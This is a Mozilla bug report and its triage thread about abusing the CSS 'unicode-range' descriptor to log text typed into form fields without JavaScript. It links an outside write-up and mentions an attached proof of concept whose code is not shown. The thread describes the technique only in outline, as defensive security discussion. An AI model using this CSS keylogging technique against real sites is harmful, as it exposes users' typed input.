style sheet can read page's text (including input in form control) through abuse of 'unicode-range' descriptor

RESOLVED WONTFIX

Status

()

Core
Graphics: Text
RESOLVED WONTFIX
2 years ago
2 years ago

People

(Reporter: sjw, Unassigned)

Tracking

Trunk
Points:
---

Firefox Tracking Flags

(firefox44 affected)

Details

(URL)

Attachments

(1 attachment)

POC
5.68 KB, text/html
Details
(Reporter)

Description

2 years ago
A POC is already released, marking this as security-sensitive anyway.

As Masato Kinugawa describes in his blog, how unicode-range can be used as a keylogger. Google marked this issue as won't fix, but it seems that he didn't report it to Mozilla (they will hopefully care a bit more).
(Reporter)

Comment 1

2 years ago



http://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html
"Source code of page can find out what keys are being pressed" isn't something new; it's been doable for years with DOM events (or, if form controls, reading the value of the control).

Is the claim here that there's a category of things that CSS couldn't previously do, *and* that people are assuming that CSS can't do and reasonably depending on that assumption for security?  (Are there cases where people use external libraries for downloadable fonts that are only linking to CSS and not linking to JS, which already has the ability to do this?)

(There are certainly plenty of existing ways that untrusted CSS could attack a page; linking to style sheets you don't trust has already been a bad idea.)
Summary: Privacy/Security issue with unicode-range spec → style sheet can read page's text (including input in form control) through abuse of 'unicode-range' descriptor
Group: core-security → gfx-core-security
Adding Masato.
Given the lack of description of what the threat is here (who is the attacker, what are they attacking), I think we should open up this bug and mark it as WONTFIX.
(Actually, perhaps INVALID or WORKSFORME makes more sense than WONTFIX, since the issue is that I don't know what the threat being reported is.)
(Reporter)

Comment 6

2 years ago
Created attachment 8690203 [details]
POC

You can find a description about a scenario on the linked blogpost.

tl;dr
An attacker can use unicode-range to map characters to a specific url, which will allow him to log user inputs *without* using JavaScript.
Of course this is a spec issue, but may be we find a way to mitigate this in Firefox.

I just uploaded the scenario linked in the blogpost with a little modification.
Just open the network monitor and type something in the input field.
(Reporter)

Comment 7

2 years ago
Note: You need to allow mixed content for the POC, because it doesn't provide https :(
(In reply to sjw from comment #6)
> An attacker can use unicode-range to map characters to a specific url, which
> will allow him to log user inputs *without* using JavaScript.

Two responses here:

 * that still doesn't say why this is a problem.  Are there people who assume that's not the case

 * this should be doable with downloadable fonts even *without* unicode-range, so I don't even think there's anything new here.  You just need to actually construct fonts with/without specific characters rather than writing the ranges in CSS.



I guess it looks like I can't actually open up security bugs anymore.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → INVALID
(In reply to David Baron [:dbaron] ⌚UTC-8 from comment #8)
> > An attacker can use unicode-range to map characters to a specific url, which
> > will allow him to log user inputs *without* using JavaScript.
> 
>  * that still doesn't say why this is a problem.  Are there people who
> assume that's not the case

There are people who think that if they disable JavaScript they are safe from maliciousness and tracking. They are incorrect, but this surprises them.
Group: gfx-core-security
The behavior Masato Kinugawa describes in his blog is a real effect; WONTFIX seems a more appropriate resolution than INVALID.
Resolution: INVALID → WONTFIX
You need to log in before you can comment on or make changes to this bug.